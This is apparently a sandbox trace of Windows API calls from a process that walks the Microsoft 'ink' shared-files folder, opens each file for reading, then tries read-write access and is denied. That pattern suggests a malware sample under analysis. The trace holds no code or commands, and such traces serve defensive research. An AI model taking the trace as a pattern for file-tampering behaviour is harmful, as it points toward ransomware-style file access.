[0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0082.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0082.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0082.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0082.058] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.058] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.058] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.058] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0082.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.058] AreFileApisANSI () returned 1 [0082.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml", lpUsedDefaultChar=0x0) returned 64 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.058] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.058] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.058] AreFileApisANSI () returned 1 [0082.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 64 [0082.059] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0082.060] GetFileType (hFile=0x42c) returned 0x1 [0082.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.060] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.060] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.060] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.060] CloseHandle (hObject=0x42c) returned 1 [0082.060] AreFileApisANSI () returned 1 [0082.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0082.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0082.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 64 [0082.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.061] GetLastError () returned 0x5 [0082.061] GetLastError () returned 0x5 [0082.061] SetLastError (dwErrCode=0x5) [0082.061] GetLastError () returned 0x5 [0082.061] SetLastError (dwErrCode=0x5) [0082.061] GetLastError () returned 0x5 [0082.061] SetLastError (dwErrCode=0x5) [0082.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0082.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.061] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0082.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0082.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0082.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0082.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0082.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0082.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0082.062] AreFileApisANSI () returned 1 [0082.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA", lpUsedDefaultChar=0x0) returned 57 [0082.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.062] AreFileApisANSI () returned 1 [0082.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0082.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 57 [0082.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.063] GetLastError () returned 0x5 [0082.063] GetLastError () returned 0x5 [0082.063] SetLastError (dwErrCode=0x5) [0082.063] GetLastError () returned 0x5 [0082.063] SetLastError (dwErrCode=0x5) [0082.063] GetLastError () returned 0x5 [0082.063] SetLastError (dwErrCode=0x5) [0082.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0082.063] AreFileApisANSI () returned 1 [0082.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0082.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 57 [0082.063] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.063] GetLastError () returned 0x5 [0082.063] GetLastError () returned 0x5 [0082.063] SetLastError (dwErrCode=0x5) [0082.063] GetLastError () returned 0x5 [0082.063] SetLastError (dwErrCode=0x5) [0082.063] GetLastError () returned 0x5 [0082.063] SetLastError (dwErrCode=0x5) [0082.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0082.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.064] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0082.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0082.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0082.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0082.064] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0082.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0082.064] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78110 [0082.064] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.065] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.066] AreFileApisANSI () returned 1 [0082.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.066] AreFileApisANSI () returned 1 [0082.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0082.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 73 [0082.066] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.067] GetFileType (hFile=0x430) returned 0x1 [0082.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0082.068] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.068] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.069] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.069] CloseHandle (hObject=0x430) returned 1 [0082.069] AreFileApisANSI () returned 1 [0082.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0082.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 73 [0082.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.069] GetLastError () returned 0x5 [0082.069] GetLastError () returned 0x5 [0082.069] SetLastError (dwErrCode=0x5) [0082.069] GetLastError () returned 0x5 [0082.069] SetLastError (dwErrCode=0x5) [0082.069] GetLastError () returned 0x5 [0082.069] SetLastError (dwErrCode=0x5) [0082.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0082.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.070] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0082.070] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 